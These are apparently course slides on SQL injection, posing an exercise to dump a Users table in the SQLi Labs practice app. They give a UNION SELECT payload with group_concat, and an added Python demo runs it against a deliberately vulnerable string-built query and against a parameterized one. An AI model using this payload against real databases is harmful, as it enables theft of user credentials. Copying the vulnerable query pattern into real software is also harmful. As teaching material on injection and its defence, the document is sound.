
Advanced SQL Injection
Dump tables

Copyright © Exdemy.com
Dump Users table using SQL Injection
● Dump (i.e. download all the records of) the Users table in SQLi Labs

Dump Users table using SQL Injection - Solution
● For dumping data, we need to use a MySQL function called group_concat to concatenate all the results
○ Then the vulnerable app shows it in the output
● So the injected query will be something like this:
○ UNION SELECT 1, .., group_concat(Column1, 0x3a, Column2, ..) from TABLE
■ 0x3a is the same as a colon (:)
● Here you can see how we dump users table using SQL Injection:
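
As an added example (not part of the original slides or of SQLi Labs), this Python sketch runs the slide's query shape against a string-built query and against a parameterized one, showing why binding the input stops the dump. It assumes an in-memory SQLite database in place of MySQL; the table names, sample rows and function names are constructed for illustration.

```python
import sqlite3

def make_db():
    # Constructed sample data; table and column names are assumptions.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (id INTEGER, name TEXT, price TEXT);
        INSERT INTO products VALUES (1, 'pen', '2');
        CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'alice', 'pw-a'), (2, 'bob', 'pw-b');
    """)
    return db

def lookup_vulnerable(db, product_id):
    # Input is pasted into the SQL text, so it can append a UNION SELECT.
    sql = "SELECT id, name, price FROM products WHERE id = " + product_id
    return db.execute(sql).fetchall()

def lookup_parameterized(db, product_id):
    # Input is bound as a value; it is never parsed as SQL.
    sql = "SELECT id, name, price FROM products WHERE id = ?"
    return db.execute(sql, (product_id,)).fetchall()

# Same shape as the slide's query. SQLite's group_concat takes one expression,
# so the fields are joined with || ':' instead of MySQL's 0x3a argument.
PAYLOAD = "0 UNION SELECT 1, 2, group_concat(username || ':' || password) FROM users"

if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, PAYLOAD))     # one row carrying every user
    print(lookup_parameterized(db, PAYLOAD))  # no rows: payload is just a value
```

The UNION only works because the injected SELECT has the same number of columns as the original query, which is what the `1, ..,` placeholders in the slide are for.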

